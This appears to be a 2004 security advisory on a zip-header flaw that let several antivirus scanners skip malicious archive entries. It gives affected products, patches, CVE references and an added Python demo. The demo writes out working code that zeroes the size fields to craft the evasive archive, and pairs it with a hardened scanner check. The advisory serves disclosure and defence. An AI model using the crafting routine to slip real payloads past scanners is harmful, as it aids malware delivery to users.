Multiple vendor antivirus .zip protection bypass
| antivirus-zip-protection-bypass (17761) |
Description:
Multiple vendor antivirus scanners, including McAfee VirusScan, InoculateIT, eTrust Antivirus, eTrust Intrusion Detection System, eTrust Secure Content Manager, eTrust EZ Armor, BrightStor ARCserve Backup, Kaspersky Antivirus (KAV), Sophos Anti-Virus, RAV AntiVirus Online Virus Scan and NOD32, could allow a remote attacker to bypass antivirus protection, caused by improper parsing of .zip archive headers. By creating a specially-crafted .zip archive in which the uncompressed size field of both the local file header and the global (central directory) header is set to zero, a remote attacker could deliver a malicious payload inside the archive without it being scanned: the scanner treats the entry as empty and skips it, while the archive can still be opened and the compressed data extracted on the target system.
Note: Archive::Zip, a freely available Perl module, version 1.13 is also affected by this vulnerability.
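The crafting step described above, and the header cross-check that a fixed scanner performs, as an added Python example that is not vendor, Archive::Zip or X-Force code. It writes a normal deflated archive with the standard library, zeroes the uncompressed-size field in both the local and the central directory headers, and then runs a naive scanner that trusts the declared size beside a hardened one that inflates every entry to the end of its deflate stream. The payload and MARKER string are constructed sample data; the parser assumes a single-disk archive without data descriptors or zip64, which is what zipfile writes to a seekable buffer.

```python
import io
import struct
import zipfile
import zlib

LOCAL_SIG, CENTRAL_SIG, EOCD_SIG = b"PK\x03\x04", b"PK\x01\x02", b"PK\x05\x06"
LOCAL_FMT, CENTRAL_FMT = "<4s5H3I2H", "<4s6H3I5H2I"       # 30- and 46-byte fixed parts
LOCAL_LEN, CENTRAL_LEN = struct.calcsize(LOCAL_FMT), struct.calcsize(CENTRAL_FMT)
LOCAL_USIZE_OFF, CENTRAL_USIZE_OFF = 22, 24               # uncompressed-size field offsets
ZIP_DEFLATED = 8

# Constructed sample content; MARKER stands in for the signature a scanner looks for.
MARKER = b"CONSTRUCTED-SAMPLE-MARKER"
PAYLOAD = b"report header\n" + MARKER + b"\nmore constructed text so the entry deflates\n"


def build_zip(name, payload):
    """Write a normal, well-formed deflated archive with the standard library."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, payload)
    return buf.getvalue()


def local_entries(buf):
    """Walk the local file headers from offset 0.
    Yields (header_offset, method, crc32, data_start, compressed_size, declared_size).
    Assumption: no data descriptors (general-purpose flag bit 3) and no zip64,
    which holds for what build_zip() writes to a seekable buffer."""
    pos = 0
    while buf[pos:pos + 4] == LOCAL_SIG:
        (_sig, _ver, _flags, method, _time, _date,
         crc, csize, usize, nlen, xlen) = struct.unpack_from(LOCAL_FMT, buf, pos)
        data_start = pos + LOCAL_LEN + nlen + xlen
        yield pos, method, crc, data_start, csize, usize
        pos = data_start + csize


def central_offsets(buf):
    """Offsets of the central directory ('global') headers, located via the
    end-of-central-directory record rather than by scanning for signatures."""
    eocd = buf.rfind(EOCD_SIG)
    pos = struct.unpack_from("<I", buf, eocd + 16)[0]     # central directory start
    while buf[pos:pos + 4] == CENTRAL_SIG:
        f = struct.unpack_from(CENTRAL_FMT, buf, pos)
        yield pos
        pos += CENTRAL_LEN + f[10] + f[11] + f[12]         # name, extra, comment lengths


def zero_uncompressed_sizes(data):
    """The evasion from the advisory: declare every entry as 0 bytes in both the
    local and the central headers while leaving the deflate stream untouched."""
    buf = bytearray(data)
    for off, *_ in local_entries(buf):
        struct.pack_into("<I", buf, off + LOCAL_USIZE_OFF, 0)
    for off in central_offsets(buf):
        struct.pack_into("<I", buf, off + CENTRAL_USIZE_OFF, 0)
    return bytes(buf)


def inflate(raw, method):
    """Raw-deflate (no zlib header) the stream to its natural end, whatever the headers say."""
    if method != ZIP_DEFLATED:
        return raw                                         # ZIP_STORED: bytes are the content
    d = zlib.decompressobj(-zlib.MAX_WBITS)
    return d.decompress(raw) + d.flush()


def naive_scan(data, marker):
    """Mirrors the vulnerable behaviour: a declared size of 0 means 'nothing to inspect'."""
    hits = []
    for off, method, _crc, start, csize, usize in local_entries(data):
        if usize == 0:
            continue
        if marker in inflate(data[start:start + csize], method)[:usize]:
            hits.append(off)
    return hits


def hardened_scan(data, marker):
    """Inflate every entry to end-of-stream and cross-check length and CRC-32 against
    the header; a mismatch is reported as a finding in its own right."""
    findings = []
    for off, method, crc, start, csize, usize in local_entries(data):
        content = inflate(data[start:start + csize], method)
        if len(content) != usize or zlib.crc32(content) != crc:
            findings.append(("header mismatch", off, usize, len(content)))
        if marker in content:
            findings.append(("marker found", off, usize, len(content)))
    return findings


def demo():
    clean = build_zip("report.txt", PAYLOAD)
    evasive = zero_uncompressed_sizes(clean)
    # The stdlib reader, like the vulnerable scanners, believes the central directory.
    with zipfile.ZipFile(io.BytesIO(evasive)) as zf:
        declared = zf.getinfo("report.txt").file_size
    return {
        "declared_size": declared,
        "naive_clean": naive_scan(clean, MARKER),
        "naive_evasive": naive_scan(evasive, MARKER),
        "hardened_evasive": hardened_scan(evasive, MARKER),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Running the script shows the naive scanner finding the marker in the clean archive and nothing in the patched one, while the hardened scanner reports both a header mismatch and the marker for the same entry. The point of the hardened path is that it never uses the declared size to decide how much to inflate; the length and CRC comparison is an additional consistency check that happens to catch this particular crafting, because the advisory's technique leaves the CRC-32 field intact.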
Platforms Affected:
- CA, BrightStor ARCserve Backup for Windows 11.1
- CA, eTrust Antivirus 7.0
- CA, eTrust Antivirus 7.1
- CA, eTrust EZ Antivirus 6.1
- CA, eTrust EZ Antivirus 6.2
- CA, eTrust EZ Antivirus 6.3
- CA, eTrust EZ Armor 2.0
- CA, eTrust EZ Armor 2.3
- CA, eTrust EZ Armor 2.4
- CA, eTrust Intrusion Detection
- CA, eTrust Secure Content Manager 8.0
- CA, InoculateIT 6.0
- ESET, NOD32 Antivirus
- GeCAD Software, RAV AntiVirus Online Virus Scan
- Gentoo, Linux
- Kaspersky, Kaspersky Anti-Virus
- MandrakeSoft, Mandrake Linux 10.0
- McAfee, VirusScan
- Ned Konz, Archive::Zip 1.13
- Sophos, Sophos Anti-Virus
Remedy:
For McAfee VirusScan:
Upgrade to the latest DATS Driver (4399 or later), available from the McAfee DAT Files Downloads Web page or McAfee Anti-Virus Updates Web page. See References.
For InoculateIT, eTrust Antivirus, eTrust Secure Content Manager, eTrust Intrusion Detection, EZ-Armor, EZ-Antivirus and BrightStor ARCserve Backup:
Apply the appropriate update for your system, available from the Computer Associates Web site. See References.
For Kaspersky Antivirus (KAV):
For scanners based on the 3.x through 4.x engines, apply the latest cumulative update, when it becomes available from the Kaspersky Web site. For scanners based on the 5.0 engine, apply the latest maintenance pack, when it becomes available from the Kaspersky Web site.
For NOD32:
Upgrade to the latest archive-support module (1.020 or later), available from the ESET Web site. See References.
For Gentoo Linux:
Upgrade to the latest version of Archive::Zip (1.14 or later), as listed in GLSA 200410-31. See References.
For Mandrake Linux:
Upgrade to the latest perl-Archive-Zip package, as listed below. Refer to MandrakeSoft Security Advisory MDKSA-2004:118 for more information. See References.
Mandrake Linux 10.0: 1.14-1.0.101mdk or later
For other distributions:
Contact your vendor for upgrade or patch information.
Consequences:
Bypass Security
References:
- CA SupportConnect Web site, Arclib.dll Vulnerability at http://supportconnectw.ca.com/public/ca_common_docs/arclib_vuln.asp.
- iDEFENSE Security Advisory 10.18.04, Multiple Vendor Anti-Virus Software Detection Evasion Vulnerability at http://www.idefense.com/application/poi/display?id=153&type=vulnerabilities&flashstatus=true.
- Kaspersky Web site, Kaspersky Labs - antivirus protection - protect your cyberspace at http://www.kaspersky.com/.
- McAfee Anti-Virus Updates Web page, Anti-Virus Updates at http://download.mcafee.com/uk/updates/updates.asp.
- McAfee DAT Files Downloads Web page, DAT Files at http://www.mcafeesecurity.com/uk/downloads/updates/dat.asp?id=1.
- BID-11448: Multiple Vendor Antivirus Software Zip Files Detection Evasion Vulnerability
- CVE-2004-0932: McAfee Anti-Virus Engine DATS drivers before 4398 released on Oct 13th 2004 and DATS Driver before 4397 October 6th 2004 allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system.
- CVE-2004-0933: Computer Associates (CA) InoculateIT 6.0, eTrust Antivirus r6.0 through r7.1, eTrust Antivirus for the Gateway r7.0 and r7.1, eTrust Secure Content Manager, eTrust Intrusion Detection, EZ-Armor 2.0 through 2.4, and EZ-Antivirus 6.1 through 6.3 allow remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system.
- CVE-2004-0934: Kaspersky 3.x to 4.x allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system.
- CVE-2004-0935: Eset Anti-Virus before 1.020 (16th September 2004) allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system.
- CVE-2004-0936: RAV antivirus allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system.
- CVE-2004-0937: Sophos Anti-Virus before 3.87.0, and Sophos Anti-Virus for Windows 95, 98, and Me before 3.88.0, allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system.
- CVE-2004-1096: Archive::Zip Perl module before 1.14, when used by antivirus programs such as amavisd-new, allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system.
- GLSA-200410-31: Archive::Zip: Virus detection evasion
- MDKSA-2004:118: Updated perl-Archive-Zip packages fix vulnerability
- SA13038: Archive::Zip Zip Archive Virus Detection Bypass Vulnerability
- US-CERT VU#492545: Archive::Zip may not properly parse the file sizes of Zip archives
- US-CERT VU#968818: Anti-virus software may not properly scan malformed zip archives
Reported:
Oct 18, 2004
The information within this database may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (IBM Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
For corrections or additions please email xforce@iss.net
